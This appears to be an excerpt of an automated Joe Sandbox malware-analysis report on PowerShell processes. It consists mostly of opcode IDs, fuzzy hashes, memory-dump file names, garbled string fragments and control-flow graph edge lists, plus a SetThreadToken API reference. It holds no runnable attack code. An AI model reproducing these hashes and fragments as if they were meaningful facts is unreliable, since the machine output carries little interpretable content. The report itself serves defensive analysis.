                                                                                          • Instruction ID: a5717e6835a21e6fb34501819d6947709492d0930b404726ddcd023efed244ea
                                                                                          • Opcode Fuzzy Hash: 4db8ae05083e67fcb56655dd37b3a0a694c081e84061eb6c112513bb12b885a4
                                                                                          • Instruction Fuzzy Hash: 0EF0ED709003149BD764EFB9E49C7AA7BE9FB44310F10446DE55ED7351DF3969808B90
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1803592875.0000000004850000.00000040.00000800.00020000.00000000.sdmp, Offset: 04850000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_4850000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 2e9ea4cb116f52d6eb6bea1edfdc0df1fe44c3f1f56840b47a787b2eb257d71e
                                                                                          • Instruction ID: de6c353ebdd640586ebbeb8533429fef39e88cea0c49f226f1b94da58df9e2e3
                                                                                          • Opcode Fuzzy Hash: 2e9ea4cb116f52d6eb6bea1edfdc0df1fe44c3f1f56840b47a787b2eb257d71e
                                                                                          • Instruction Fuzzy Hash: 3FE0DF3530421087CB09B779A41C2AE7AA6EBC5724F00002EEA0A83343CFF9194183D6
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1803592875.0000000004850000.00000040.00000800.00020000.00000000.sdmp, Offset: 04850000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_4850000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 5b3501789c60b1bc1ef865f0e5dd1d27a58315123eb3f0eab0b7a79f5ff93145
                                                                                          • Instruction ID: dfefac4375cfdea87abb2e92173a74dff008af08039ab99c65d84560a7d26082
                                                                                          • Opcode Fuzzy Hash: 5b3501789c60b1bc1ef865f0e5dd1d27a58315123eb3f0eab0b7a79f5ff93145
                                                                                          • Instruction Fuzzy Hash: B7D05E12702125171A9831BE18006BBA5DE8AC48A5705077BDE09C3261EE84EC2903F2
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1803592875.0000000004850000.00000040.00000800.00020000.00000000.sdmp, Offset: 04850000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_4850000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
                                                                                          • Instruction ID: 7fdb1b3b893673297e9e080d9ec02242f4dea911d1704c0397544655d5fb2865
                                                                                          • Opcode Fuzzy Hash: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
                                                                                          • Instruction Fuzzy Hash: C5E08631B10018978B089959D4104EDF7AADBCC224F04C47ADD0AE7350DA32691586E1
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1803592875.0000000004850000.00000040.00000800.00020000.00000000.sdmp, Offset: 04850000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_4850000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: ca69d8a339886a707d12789c30e609952a030458a995378fc801a54b14d1fbfd
                                                                                          • Instruction ID: 9e1d8a98326f6548c820d086b8d0d4a9ba1b2f6b122564b137ba92a60a6c9070
                                                                                          • Opcode Fuzzy Hash: ca69d8a339886a707d12789c30e609952a030458a995378fc801a54b14d1fbfd
                                                                                          • Instruction Fuzzy Hash: 0AD02B6770C1D207EF1B803D74606AA4FE78BC622070AC779E844C7700CC818C0643D0
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1803592875.0000000004850000.00000040.00000800.00020000.00000000.sdmp, Offset: 04850000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_4850000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: c33ef2ffdb5713035e437ce3fc360f2e09cb86eefe614fecd14f0afffb297fe8
                                                                                          • Instruction ID: 182526ec107ee5b6d2dc2d58c945616829122f8386fda94fd33d8621615899b5
                                                                                          • Opcode Fuzzy Hash: c33ef2ffdb5713035e437ce3fc360f2e09cb86eefe614fecd14f0afffb297fe8
                                                                                          • Instruction Fuzzy Hash: 5EE06D70D042898FCB40DFB9C58126DBFF0AB09614B2086AECA59D6215E7715611DB81
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1803592875.0000000004850000.00000040.00000800.00020000.00000000.sdmp, Offset: 04850000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_4850000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: edae7e80b318afed38f0b6cfdc21197d752dc66dad2d95013dfdf64caf09c8f3
                                                                                          • Instruction ID: eb95863081732a032e002cb3733a161ab69aeff6deb7a948e8575d3a17b62492
                                                                                          • Opcode Fuzzy Hash: edae7e80b318afed38f0b6cfdc21197d752dc66dad2d95013dfdf64caf09c8f3
                                                                                          • Instruction Fuzzy Hash: 2BE04F31C0514ACBCB09EF78E98E8FDBF70EA11311B00029ED91792161DF30165ACE86
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1803592875.0000000004850000.00000040.00000800.00020000.00000000.sdmp, Offset: 04850000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_4850000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: d0e7d42db18e268a5884df7b7df939ddc40e3b3f37baa87a2b37c752e245c255
                                                                                          • Instruction ID: 983056b3f7abddbd54a67b27b83ae31311d536580e8b47b6b34a26871ea69f30
                                                                                          • Opcode Fuzzy Hash: d0e7d42db18e268a5884df7b7df939ddc40e3b3f37baa87a2b37c752e245c255
                                                                                          • Instruction Fuzzy Hash: B8E04F75A0824ACFC704EFA4E59986A7FB4EB49200F1041ADDD4597766EE306851DB82
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1803592875.0000000004850000.00000040.00000800.00020000.00000000.sdmp, Offset: 04850000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_4850000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                                                          • Instruction ID: 2d85a6f6f49e46b5a6824f42315c1d325e74fd64fd0e1702351f2c1c4cdbb02d
                                                                                          • Opcode Fuzzy Hash: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                                                          • Instruction Fuzzy Hash: FBD06271D0420D9F8780EFADC94156DFBF4EB48204F5085AA8A19D7315F7315612DFD1
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1803592875.0000000004850000.00000040.00000800.00020000.00000000.sdmp, Offset: 04850000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_4850000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: c259c4bcec5edaea10cfe732bb68f41567afc10edc5223614733414e7bbaf2c8
                                                                                          • Instruction ID: ac3dc9541aca55ad7af0e4fbf20d6bee900c1015565c37f775596ad2cbb1e9da
                                                                                          • Opcode Fuzzy Hash: c259c4bcec5edaea10cfe732bb68f41567afc10edc5223614733414e7bbaf2c8
                                                                                          • Instruction Fuzzy Hash: 07D0673190510DCBCB08EBA5F85E4BDBB74FA14305F40416ED91792191EF312A9ACAC6
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1803592875.0000000004850000.00000040.00000800.00020000.00000000.sdmp, Offset: 04850000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_4850000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: e12fcc75a925227fab5f0967d3a94ed6cdd0aa6c630891f4c3157677cd56d79d
                                                                                          • Instruction ID: 7c1be84a1cbe889b1e31942b61cd28ee4ce949baff7fb0de717bc432f2d53a32
                                                                                          • Opcode Fuzzy Hash: e12fcc75a925227fab5f0967d3a94ed6cdd0aa6c630891f4c3157677cd56d79d
                                                                                          • Instruction Fuzzy Hash: A2D01734A0820ACB8B08EFA4E84A87EBBB4EB48204F00416EDD0A93351EA306C51CBC1
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1803592875.0000000004850000.00000040.00000800.00020000.00000000.sdmp, Offset: 04850000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_4850000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: c1a53b33723eb97add0f8eb2d6594f031489c313417083084b191c592936c61b
                                                                                          • Instruction ID: c404bb3449377241b6d5247c3aec3d6bba7309f24aeb27bf6c0cdce3a298ce4f
                                                                                          • Opcode Fuzzy Hash: c1a53b33723eb97add0f8eb2d6594f031489c313417083084b191c592936c61b
                                                                                          • Instruction Fuzzy Hash: 61D0C93444E3C8AFC7179F789899C553F789E4352470A04DED88A9F1B7CA668449CB16
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1803592875.0000000004850000.00000040.00000800.00020000.00000000.sdmp, Offset: 04850000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_4850000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 384bd56e7fcec81bbd39cedfb5ece26bae9fd8cf2ffcb1fdb722d7d1c30bd477
                                                                                          • Instruction ID: e4529f74827aab0b6f529147d6e8f0788bb3cf5b64e4a41da4f5923b9846c169
                                                                                          • Opcode Fuzzy Hash: 384bd56e7fcec81bbd39cedfb5ece26bae9fd8cf2ffcb1fdb722d7d1c30bd477
                                                                                          • Instruction Fuzzy Hash: 2AC04C1841E3D01FEF13873589D96127FB2098392970B51CAD181DE467C668880AD763
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1803592875.0000000004850000.00000040.00000800.00020000.00000000.sdmp, Offset: 04850000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_4850000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 2cb084c4929339073be94e8185c1f00ebda9db1b7f2c0013b206e5ab3f91eb6f
                                                                                          • Instruction ID: 50b467bd095f552b731601e9cbfe28238387dc87a5b62cbd72164b2d612bcae2
                                                                                          • Opcode Fuzzy Hash: 2cb084c4929339073be94e8185c1f00ebda9db1b7f2c0013b206e5ab3f91eb6f
                                                                                          • Instruction Fuzzy Hash: AFB092341457088FC3486F75A408824732DEB40615B8104A8E80E0A2A68E76E884CA45
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1818925684.00000000076C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076C0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_76c0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 4'fq$4'fq$]$$fq$$fq$$fq$l$l
                                                                                          • API String ID: 0-3777635414
                                                                                          • Opcode ID: 712c38f98d7813f081aeeec9692a904fc4b19aa7a9207b7eb0c525df879d066e
                                                                                          • Instruction ID: cc9d51d3f7d3daa79bc1f7cefb3793e06e7feeb747b643bd1c14d72d1867df3c
                                                                                          • Opcode Fuzzy Hash: 712c38f98d7813f081aeeec9692a904fc4b19aa7a9207b7eb0c525df879d066e
                                                                                          • Instruction Fuzzy Hash: D95114F17052469BCB24DA7A8911776BBA6EFC2610F24C06FD546CB341DB35C881CBA3
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1818925684.00000000076C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076C0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_76c0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: fkq$4'fq$4'fq$4'fq$4'fq
                                                                                          • API String ID: 0-1499809691
                                                                                          • Opcode ID: a6f0fff5b4afc98a94092b0a72350f4c3b53d3f70ab8eac89fd7929518e5fdbf
                                                                                          • Instruction ID: 7cb48fa1af7734b5b0e5a795a72bc829d35103ff2e5407eda1db5b43083e2b8e
                                                                                          • Opcode Fuzzy Hash: a6f0fff5b4afc98a94092b0a72350f4c3b53d3f70ab8eac89fd7929518e5fdbf
                                                                                          • Instruction Fuzzy Hash: BBF1F3B1B04245CFCB25DBB8881177ABBA6EFC6214F14C0AED546CB752DA35CC46CBA1
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1818925684.00000000076C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076C0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_76c0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: $ck$4'fq$4'fq$tPfq$tPfq
                                                                                          • API String ID: 0-3335184582
                                                                                          • Opcode ID: 698f4be826ba1759bec49e49e2325ca6001215f062ba10fa10e554a28829674e
                                                                                          • Instruction ID: eb74062fa8f265ade122b7e09f1b1b62d417a5325697f7d7d6e465494447c574
                                                                                          • Opcode Fuzzy Hash: 698f4be826ba1759bec49e49e2325ca6001215f062ba10fa10e554a28829674e
                                                                                          • Instruction Fuzzy Hash: 24A12BF1B0420A8FD725DA798410677FBA6EFC6210F1880AFD956DB346CB35C845C7A1
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1803592875.0000000004850000.00000040.00000800.00020000.00000000.sdmp, Offset: 04850000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_4850000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: `gq$`gq$`gq$`gq
                                                                                          • API String ID: 0-3352594996
                                                                                          • Opcode ID: 260216084664b824065f148567cc778816119870750f0e763e02eac8dcbbd94d
                                                                                          • Instruction ID: 66bae939ff359abcd84efecb455aa059710ef8561e32d6b4270c0d258ad261a9
                                                                                          • Opcode Fuzzy Hash: 260216084664b824065f148567cc778816119870750f0e763e02eac8dcbbd94d
                                                                                          • Instruction Fuzzy Hash: A8B1A674E012099FDB55DFA9D980A9EFBF2FF48300F109629E819AB315DB34A945CF90
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1803592875.0000000004850000.00000040.00000800.00020000.00000000.sdmp, Offset: 04850000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_4850000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: `gq$`gq$`gq$`gq
                                                                                          • API String ID: 0-3352594996
                                                                                          • Opcode ID: f4951c19607c0a963c12f8ab872a543c80d2418e5013e749b95db44883995745
                                                                                          • Instruction ID: 6cc6e964e3ad5ac8e0e6ddb00a07370dede1c18eda23fe05266b3666a234b66e
                                                                                          • Opcode Fuzzy Hash: f4951c19607c0a963c12f8ab872a543c80d2418e5013e749b95db44883995745
                                                                                          • Instruction Fuzzy Hash: DCB1A674E002099FDB54DFA9D980A9EFBF2FF48304F109629E819AB315DB30A945CF90
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1818925684.00000000076C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076C0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_76c0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: $fq$$fq$$fq$$fq
                                                                                          • API String ID: 0-2113499236
                                                                                          • Opcode ID: ad0c2ac4cba6797980a07be301cf8081da4617e6493c710891a428a4b51d0ec8
                                                                                          • Instruction ID: 1584c3a8d5694ee6b627ba70685b15a813ed66696817a0917c0010c96b2819b3
                                                                                          • Opcode Fuzzy Hash: ad0c2ac4cba6797980a07be301cf8081da4617e6493c710891a428a4b51d0ec8
                                                                                          • Instruction Fuzzy Hash: D22123B17112229BDB38DA7A8C41737BB9AEBC0755F34802EA50BCB382DD75E8518361
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1818925684.00000000076C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076C0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_76c0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 4'fq$4'fq$$fq$$fq
                                                                                          • API String ID: 0-2206495126
                                                                                          • Opcode ID: 8dc4a382a2d168c3b709a4be1dfae70ec3105bd6c80c2f775034a615ccfef676
                                                                                          • Instruction ID: af7517b1fe109feb978f9634076e627036a03f3f4233fa8cf6b3371c2f749bd1
                                                                                          • Opcode Fuzzy Hash: 8dc4a382a2d168c3b709a4be1dfae70ec3105bd6c80c2f775034a615ccfef676
                                                                                          • Instruction Fuzzy Hash: B801A76170D3C68FCB2B967898201667FB6AF83550B1941DBC08ADF397CE198D0687B7

                                                                                          Execution Graph

                                                                                          Execution Coverage:6.7%
                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                          Signature Coverage:0%
                                                                                          Total number of Nodes:3
                                                                                          Total number of Limit Nodes:0
                                                                                          execution_graph 20006 8c56890 20007 8c568d3 SetThreadToken 20006->20007 20008 8c56901 20007->20008

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 375 4c6b490-4c6b4a9 376 4c6b4ae-4c6b7f5 call 4c6acbc 375->376 377 4c6b4ab 375->377 377->376
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000009.00000002.1848246543.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_9_2_4c60000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: {Ym^$Ym^
                                                                                          • API String ID: 0-2374741261
                                                                                          • Opcode ID: 7c08e3baefd1fea2cb4002c25960df2c49e4d2200fa889732beb7e4766fc6b99
                                                                                          • Instruction ID: bbdb5d7794ea18c91ad26a6055487251e89430fcb265f67dbeb37e7af466ab01
                                                                                          • Opcode Fuzzy Hash: 7c08e3baefd1fea2cb4002c25960df2c49e4d2200fa889732beb7e4766fc6b99
                                                                                          • Instruction Fuzzy Hash: A5916CB4F007245BDB19DFB58A5066EBBA6EFC4600B008929E106AF394DF39AD018BD5

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 0 7ae3ce8-7ae3d0d 1 7ae3d13-7ae3d18 0->1 2 7ae3f00-7ae3f4a 0->2 3 7ae3d1a-7ae3d20 1->3 4 7ae3d30-7ae3d34 1->4 14 7ae40ce-7ae4112 2->14 15 7ae3f50-7ae3f55 2->15 5 7ae3d24-7ae3d2e 3->5 6 7ae3d22 3->6 7 7ae3d3a-7ae3d3c 4->7 8 7ae3eb0-7ae3eba 4->8 5->4 6->4 12 7ae3d3e-7ae3d4a 7->12 13 7ae3d4c 7->13 10 7ae3ebc-7ae3ec5 8->10 11 7ae3ec8-7ae3ece 8->11 18 7ae3ed4-7ae3ee0 11->18 19 7ae3ed0-7ae3ed2 11->19 21 7ae3d4e-7ae3d50 12->21 13->21 29 7ae4228-7ae425d 14->29 30 7ae4118-7ae411d 14->30 16 7ae3f6d-7ae3f71 15->16 17 7ae3f57-7ae3f5d 15->17 26 7ae3f77-7ae3f79 16->26 27 7ae4080-7ae408a 16->27 22 7ae3f5f 17->22 23 7ae3f61-7ae3f6b 17->23 24 7ae3ee2-7ae3efd 18->24 19->24 21->8 28 7ae3d56-7ae3d75 21->28 22->16 23->16 32 7ae3f7b-7ae3f87 26->32 33 7ae3f89 26->33 34 7ae408c-7ae4094 27->34 35 7ae4097-7ae409d 27->35 67 7ae3d77-7ae3d83 28->67 68 7ae3d85 28->68 53 7ae425f-7ae4281 29->53 54 7ae428b-7ae4295 29->54 37 7ae411f-7ae4125 30->37 38 7ae4135-7ae4139 30->38 39 7ae3f8b-7ae3f8d 32->39 33->39 40 7ae409f-7ae40a1 35->40 41 7ae40a3-7ae40af 35->41 44 7ae4129-7ae4133 37->44 45 7ae4127 37->45 46 7ae413f-7ae4141 38->46 47 7ae41da-7ae41e4 38->47 39->27 49 7ae3f93-7ae3fb2 39->49 50 7ae40b1-7ae40cb 40->50 41->50 44->38 45->38 51 7ae4143-7ae414f 46->51 52 7ae4151 46->52 55 7ae41e6-7ae41ee 47->55 56 7ae41f1-7ae41f7 47->56 91 7ae3fb4-7ae3fc0 49->91 92 7ae3fc2 49->92 63 7ae4153-7ae4155 51->63 52->63 98 7ae42d5-7ae42fe 53->98 99 7ae4283-7ae4288 53->99 60 7ae429f-7ae42a5 54->60 61 7ae4297-7ae429c 54->61 65 7ae41fd-7ae4209 56->65 66 7ae41f9-7ae41fb 56->66 71 7ae42ab-7ae42b7 60->71 72 7ae42a7-7ae42a9 60->72 63->47 74 7ae415b-7ae415d 63->74 75 7ae420b-7ae4225 65->75 66->75 70 7ae3d87-7ae3d89 67->70 68->70 70->8 77 7ae3d8f-7ae3d96 70->77 79 7ae42b9-7ae42d2 71->79 72->79 80 7ae415f-7ae4165 74->80 81 7ae4177-7ae417e 74->81 77->2 83 7ae3d9c-7ae3da1 77->83 87 7ae4169-7ae4175 80->87 88 7ae4167 80->88 89 7ae4196-7ae41d7 81->89 90 7ae4180-7ae4186 81->90 95 7ae3db9-7ae3dc8 83->95 96 7ae3da3-7ae3da9 83->96 87->81 88->81 100 7ae418a-7ae4194 90->100 101 7ae4188 90->101 93 7ae3fc4-7ae3fc6 91->93 92->93 93->27 102 7ae3fcc-7ae4003 93->102 95->8 113 7ae3dce-7ae3dec 95->113 104 7ae3dad-7ae3db7 96->104 105 7ae3dab 96->105 115 7ae432d-7ae435c 98->115 116 7ae4300-7ae4326 98->116 100->89 101->89 126 7ae401d-7ae4024 102->126 127 7ae4005-7ae400b 102->127 104->95 105->95 113->8 123 7ae3df2-7ae3e17 113->123 124 7ae435e-7ae437b 115->124 125 7ae4395-7ae439f 115->125 116->115 123->8 149 7ae3e1d-7ae3e24 123->149 143 7ae437d-7ae438f 124->143 144 7ae43e5-7ae43ea 124->144 131 7ae43a8-7ae43ae 125->131 132 7ae43a1-7ae43a5 125->132 133 7ae403c-7ae407d 126->133 134 7ae4026-7ae402c 126->134 129 7ae400f-7ae401b 127->129 130 7ae400d 127->130 129->126 130->126 137 7ae43b4-7ae43c0 131->137 138 7ae43b0-7ae43b2 131->138 135 7ae402e 134->135 136 7ae4030-7ae403a 134->136 135->133 136->133 142 7ae43c2-7ae43e2 137->142 138->142 143->125 144->143 152 7ae3e6a-7ae3e9d 149->152 153 7ae3e26-7ae3e41 149->153 163 7ae3ea4-7ae3ead 152->163 157 7ae3e5b-7ae3e5f 153->157 158 7ae3e43-7ae3e49 153->158 162 7ae3e66-7ae3e68 157->162 160 7ae3e4d-7ae3e59 158->160 161 7ae3e4b 158->161 160->157 161->157 162->163
Strings
Memory Dump Source
• Source File: 00000009.00000002.1872944589.0000000007AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_7ae0000_powershell.jbxd
Similarity
• API ID:
• String ID: 4'fq$4'fq$4'fq$4'fq
• API String ID: 0-359900465
• Opcode ID: b8b41ac0b87c4fc93d4cabb827c7d1222d20cda7aaa16d16ff519d2d76a0cb60
• Instruction ID: 40618226b907a9df25daa2cb13339baaf3b54c94f804a087d85ac9e676cc974c
• Opcode Fuzzy Hash: b8b41ac0b87c4fc93d4cabb827c7d1222d20cda7aaa16d16ff519d2d76a0cb60
• Instruction Fuzzy Hash: 1C1247B1B04246CFCF259B78881176ABFBA9FC5314F1480BAE565CB641DB35CC41CBA1
Strings
Memory Dump Source
• Source File: 00000009.00000002.1872944589.0000000007AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_7ae0000_powershell.jbxd
Similarity
• API ID:
• String ID: 4'fq$4'fq$|,j
• API String ID: 0-1469847931
• Opcode ID: 069c274a6e2b6ac688879ad02054fd7d091ff6a5645d2699a1fd8d04378264f0
• Instruction ID: 59d1c848b9d8bb80b1b8743247881d396089ac3c7c5c68614ddfd939bb3653c7
• Opcode Fuzzy Hash: 069c274a6e2b6ac688879ad02054fd7d091ff6a5645d2699a1fd8d04378264f0
• Instruction Fuzzy Hash: 9A2205B1B006068FCB249BA8885176ABBFDFFC5311F14807AE525DB291DB35D941CBA2

Control-flow Graph (graph edge list omitted; calls SetThreadToken)
APIs
Memory Dump Source
• Source File: 00000009.00000002.1876752021.0000000008C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08C50000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_8c50000_powershell.jbxd
Similarity
• API ID: ThreadToken
• String ID:
• API String ID: 3254676861-0
• Opcode ID: 063e21836b28d15f54e9585876e3aaa6e18008b7697d5c25fb14526422d12fc9
• Instruction ID: c43d4d7fda65cbe02e881d99cfd3c0589ed22ab23934ee1930ba03611233f4d1
• Opcode Fuzzy Hash: 063e21836b28d15f54e9585876e3aaa6e18008b7697d5c25fb14526422d12fc9
• Instruction Fuzzy Hash: 7C1113B59002488FCB10CF9EC584BDEFBF4AB88320F24845AD459A7310C774A944CFA1

Control-flow Graph (graph edge list omitted; calls SetThreadToken)
APIs
Memory Dump Source
• Source File: 00000009.00000002.1876752021.0000000008C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08C50000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_8c50000_powershell.jbxd
Similarity
• API ID: ThreadToken
• String ID:
• API String ID: 3254676861-0
• Opcode ID: a310435b5e17fb04c889e25811b86be60faf0d5506846cc7056d32bb3d4549a4
• Instruction ID: f0a309fc70d48b825a8df7e24ddde2a33fd7c23eeee6f8934a930928164a8568
• Opcode Fuzzy Hash: a310435b5e17fb04c889e25811b86be60faf0d5506846cc7056d32bb3d4549a4
• Instruction Fuzzy Hash: 8E11F5B59002498FCB10DF9EC984B9EFBF8EB88324F24845AD458A7350D774A944CFA5

Control-flow Graph (graph edge list omitted; internal calls to 4c67664, 4c6767f, 4c6bf10)
Strings
Memory Dump Source
• Source File: 00000009.00000002.1848246543.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_4c60000_powershell.jbxd
Similarity
• API ID:
• String ID: (jq
• API String ID: 0-3225323518
• Opcode ID: 1fd79861bbdeaee6e6a49353d2bf84a9d37f2cca3d0e99bffc144a55ae970718
• Instruction ID: e766b4d4d9341a2755400cf6f2e77c2dd9be124f8b716cf7e8dbba775270c3fa
• Opcode Fuzzy Hash: 1fd79861bbdeaee6e6a49353d2bf84a9d37f2cca3d0e99bffc144a55ae970718
• Instruction Fuzzy Hash: 21415134B042058FDB14DFA8C594AAD7BF2EF8D315F148499D406AB391DB35ED01CB61

Control-flow Graph (graph edge list omitted; internal call to 4c6a984)
Strings
Memory Dump Source
• Source File: 00000009.00000002.1848246543.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_4c60000_powershell.jbxd
Similarity
• API ID:
• String ID: (&fq
• API String ID: 0-1822945044
• Opcode ID: b74a9d6d3de4fd4ba5d9645444a21b134e998cc4cf11740e48ac670fee6caba9
• Instruction ID: ca822f5b7fdfb3b7bf7feed89c55d8808e0f2944f7b22a02d7fff19f27dc7900
• Opcode Fuzzy Hash: b74a9d6d3de4fd4ba5d9645444a21b134e998cc4cf11740e48ac670fee6caba9
• Instruction Fuzzy Hash: CA21B5B5A042588FCB14DFAED540B9EBFF6EF89320F14846ED019E7340CA75A905CBA5

Control-flow Graph (graph edge list omitted; internal calls to 4c6dce8, 4c6dcd9)
Strings
Memory Dump Source
• Source File: 00000009.00000002.1848246543.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_4c60000_powershell.jbxd
Similarity
• API ID:
• String ID: +/m^
